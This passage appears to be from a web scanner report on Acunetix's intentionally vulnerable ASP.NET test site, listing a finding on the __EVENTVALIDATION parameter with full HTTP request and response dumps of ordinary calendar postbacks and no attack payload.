using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8407&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAtB5C8NoIZGRklNxOUE4%2FQdmVDV5QVpTPe6KaWDU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLOgJL3CAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUdhbFjnDy2ODJSJNE1rTpCz8%2Fk5w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:04 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAtB5C8NoIZGRklNxOUE4/QdmVDV5QVpTPe6KaWDU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLOgJL3CAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUdhbFjnDy2ODJSJNE1rTpCz8/k5w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:White" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8491&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAZwlEMtsIZGRkqJOuZGvoB0lMUIMlW1%2FqjICFl1A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLOnZOcBwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcMymQq0zVu1bwSQZypwCTtvDh3kw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:47 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAZwlEMtsIZGRkqJOuZGvoB0lMUIMlW1/qjICFl1A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLOnZOcBwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcMymQq0zVu1bwSQZypwCTtvDh3kw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:White" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious 